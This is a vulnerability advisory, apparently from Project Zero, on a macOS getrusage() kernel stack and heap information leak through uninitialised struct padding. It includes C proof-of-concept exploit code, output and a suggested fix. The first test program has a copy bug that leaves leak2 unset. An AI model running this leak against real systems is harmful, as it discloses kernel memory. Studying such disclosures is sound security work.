macOS - 'getrusage' Stack Leak Through struct Padding

Properties

Published:
12.12.2017
Target:
macOS

Code

/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405
 
For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:
 
int
getrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)
{
  struct rusage *rup, rubuf;
  struct user64_rusage rubuf64;
  struct user32_rusage rubuf32;
  size_t retsize = sizeof(rubuf);     // default: 32 bits 
  caddr_t retbuf = (caddr_t)&rubuf;   // default: 32 bits 
  struct timeval utime;
  struct timeval stime;
 
 
  switch (uap->who) {
  case RUSAGE_SELF:
    calcru(p, &utime, &stime, NULL);
    proc_lock(p);
    rup = &p->p_stats->p_ru;
    rup->ru_utime = utime;
    rup->ru_stime = stime;
 
    rubuf = *rup;
    proc_unlock(p);
 
    break;
  [...]
  }
  if (IS_64BIT_PROCESS(p)) {
    retsize = sizeof(rubuf64);
    retbuf = (caddr_t)&rubuf64;
    munge_user64_rusage(&rubuf, &rubuf64);
  } else {
    [...]
  }
 
  return (copyout(retbuf, uap->rusage, retsize));
}
 
`munge_user64_rusage()` performs the conversion by copying individual fields:
 
__private_extern__  void 
munge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)
{
  // timeval changes size, so utime and stime need special handling 
  a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;
  a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;
  a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;
  a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;
[...]
}
 
`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:
 
#define _STRUCT_USER64_TIMEVAL    struct user64_timeval
_STRUCT_USER64_TIMEVAL
{
  user64_time_t            tv_sec;        // seconds 
  __int32_t                tv_usec;       // and microseconds 
};
 
struct  user64_rusage {
  struct user64_timeval ru_utime; // user time used 
  struct user64_timeval ru_stime; // system time used 
  user64_long_t ru_maxrss;    // max resident set size 
[...]
};
 
This padding is not initialized, but is copied to userspace.
 
 
The following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.
 
 
Just leaking stack data from a previous syscall seems to mostly return the upper halves of some kernel pointers.
The returned data seems to come from the previous syscall:
 
$ cat test.c
#include <sys/time.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
 
void do_leak(void) {
  static struct rusage ru;
  getrusage(RUSAGE_SELF, &ru);
  static unsigned int leak1, leak2;
  memcpy(&leak1, ((char*)&ru)+12, 4);
  memcpy(&leak1, ((char*)&ru)+28, 4);
  printf("leak1: 0x%08x\n", leak1);
  printf("leak2: 0x%08x\n", leak2);
}
 
int main(void) {
  do_leak();
  do_leak();
  do_leak();
  int fd = open("/dev/null", O_RDONLY);
  do_leak();
  int dummy;
  read(fd, &dummy, 4);
  do_leak();
  return 0;
}
$ gcc -o test test.c && ./test
leak1: 0x00000000
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff81
leak2: 0x00000000
 
 
However, I believe that this can also be used to disclose kernel heap memory.
When the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack
without zeroing it, so the new stack contains data from previous heap allocations.
The following testcase, when run after repeatedly reading a wordlist into memory,
leaks some non-pointer data that seems to come from the wordlist:
 
$ cat forktest.c 
*/
 
#include <sys/time.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
 
/*
 * Byte offsets, inside the buffer filled by getrusage(), of the 4-byte
 * padding that follows ru_utime.tv_usec and ru_stime.tv_usec. They assume
 * the 64-bit macOS layout described in the write-up: an 8-byte tv_sec, a
 * 4-byte tv_usec, then 4 bytes of padding per timeval.
 */
enum {
  UTIME_PAD_OFFSET = 12,
  STIME_PAD_OFFSET = 28,
  PAD_SIZE = 4
};

/*
 * Prints "<label>: 0x<value as 8 hex digits>\n" on stdout.
 *
 * A value of zero is treated as "nothing leaked" and is not reported.
 * write(2) is used instead of stdio, presumably because the forked child
 * in this file terminates through a raw exit syscall, which would never
 * flush stdio buffers.
 */
static void report_leak(const char *label, unsigned int value) {
  char line[32];
  int len;

  if (value == 0) {
    return;
  }

  len = snprintf(line, sizeof line, "%s: 0x%08x\n", label, value);
  if (len < 0) {
    return;
  }
  if ((size_t)len >= sizeof line) {
    len = (int)(sizeof line - 1);  /* truncated: emit what fits */
  }
  if (write(1, line, (size_t)len) < 0) {
    /* Nothing useful can be done if stdout is unwritable. */
  }
}

/*
 * Calls getrusage(RUSAGE_SELF) and reports the contents of the two padding
 * words behind the tv_usec fields, which the kernel copies out without
 * initializing them. Non-zero padding is printed as "leak1"/"leak2".
 *
 * If getrusage() fails nothing is reported: the buffer is static, so it
 * would otherwise still hold the bytes returned by an earlier call.
 */
void do_leak(void) {
  static struct rusage ru;
  unsigned int leak1 = 0;
  unsigned int leak2 = 0;

  if (getrusage(RUSAGE_SELF, &ru) != 0) {
    return;
  }

  /* memcpy avoids unaligned/aliasing-unsafe reads of the raw struct bytes. */
  memcpy(&leak1, (const char *)&ru + UTIME_PAD_OFFSET, PAD_SIZE);
  memcpy(&leak2, (const char *)&ru + STIME_PAD_OFFSET, PAD_SIZE);

  report_leak("leak1", leak1);
  report_leak("leak2", leak2);
}
 
/*
 * Forks with a raw syscall and, in the child only, samples the getrusage()
 * padding once via do_leak().
 *
 * The child then blocks reading one byte from stdin and finally terminates
 * with a raw exit(0) syscall. The parent returns immediately and does not
 * wait for the child.
 * NOTE(review): the blocking read presumably keeps each child (and its
 * kernel stack) alive so that later forks need freshly allocated stacks;
 * confirm before changing it.
 *
 * x86_64 macOS only: relies on the Darwin BSD syscall class 0x02000000.
 */
void leak_in_child(void) {
  int res_pid, res2;
  unsigned char fork_failed;

  /*
   * fork is BSD syscall 2. The kernel returns two values: rax and rdx,
   * where rdx == 1 marks the child. Failure is signalled through the carry
   * flag, in which case rdx is not a valid child/parent indicator, so the
   * flag is captured with setc right after the syscall. rcx and r11 are
   * overwritten by the `syscall` instruction itself.
   */
  asm volatile(
    "mov $0x02000002, %%rax\n\t"
    "syscall\n\t"
    "setc %2\n\t"
  : "=a"(res_pid), "=d"(res2), "=r"(fork_failed)
  :
  : "cc", "memory", "rcx", "r11"
  );
  (void)res_pid;  /* only bound so the compiler knows rax is overwritten */

  if (fork_failed || res2 != 1) {
    /* fork failed, or we are the parent: nothing more to do here. */
    return;
  }

  /* Child: sample the leak, then park on stdin until input or EOF. */
  do_leak();
  char dummy;
  read(0, &dummy, 1);

  /* exit is BSD syscall 1; status 0 goes in rdi. Does not return. */
  asm volatile(
    "mov $0x02000001, %rax\n\t"
    "mov $0, %rdi\n\t"
    "syscall\n\t"
  );
}
 
/*
 * Entry point: runs leak_in_child() 1000 times in a row, so up to 1000
 * children each get one chance to report leaked padding bytes.
 */
int main(void) {
  int remaining = 1000;

  while (remaining-- > 0) {
    leak_in_child();
  }
  return 0;
}
/*
$ gcc -o forktest forktest.c && ./forktest
leak1: 0x1b3b1320
leak1: 0x00007f00
leak1: 0x65686375
leak1: 0x410a2d63
leak1: 0x8162ced5
leak1: 0x65736168
leak1: 0x0000042b
 
The leaked values include the strings "uche", "c-\nA" and "hase", which could plausibly come from the wordlist.
 
 
Apart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.
*/